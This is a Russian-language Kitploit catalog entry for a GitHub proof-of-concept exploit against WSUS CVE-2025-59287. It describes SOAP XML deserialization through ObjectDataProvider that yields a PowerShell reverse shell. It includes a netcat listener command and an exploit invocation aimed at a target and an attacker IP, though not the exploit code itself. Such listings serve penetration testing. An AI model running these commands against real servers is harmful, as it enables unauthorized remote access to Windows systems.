Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-59287 — PoC-эксплойт для WSUS CVE-2025-59287, использующий XML-десериализацию для получения обратной оболочки Windows через SOAP и ObjectDataProvider. | Kitploit
Инструменты/GitHubGitHub/furkankayapinar/cve-2025-59287
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHubfurkankayapinar/cve-2025-59287

CVE-2025-59287

PoC-эксплойт для WSUS CVE-2025-59287, использующий XML-десериализацию для получения обратной оболочки Windows через SOAP и ObjectDataProvider.

Репозиторий
10 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-59287

WSUS CVE-2025-59287 – XML-десериализация RCE (Reverse Shell) Сфокусированный PoC для эксплуатации WSUS CVE-2025-59287 через XML-десериализацию для получения reverse shell в Windows. Этот скрипт поддерживает только полезную нагрузку reverse shell (без запасного варианта calc). Цель: Windows Server с ролью WSUS Техника: десериализация SOAP + ObjectDataProvider Результат: cmd.exe запускает PowerShell reverse shell на ваш listener Дисклеймер Только для авторизованного тестирования в лабораторных средах. Вы несёте ответственность за соблюдение всех применимых законов. Требования Python 3.x Сетевой доступ к конечным точкам WSUS (обычно 8530/8531) Listener на вашей машине (например, nc)

Запуск listener

nc -lvnp 4444

Запуск эксплойта

python3 my-CVE-2025-59287.py -u http://TARGET:8531 -l YOUR_IP -p 4444 --debug

-u: базовый URL WSUS (http/https, обычно порт 8530/8531) -l: ваш IP для получения shell -p: порт вашего listener --debug: подробный вывод

Скачать инструмент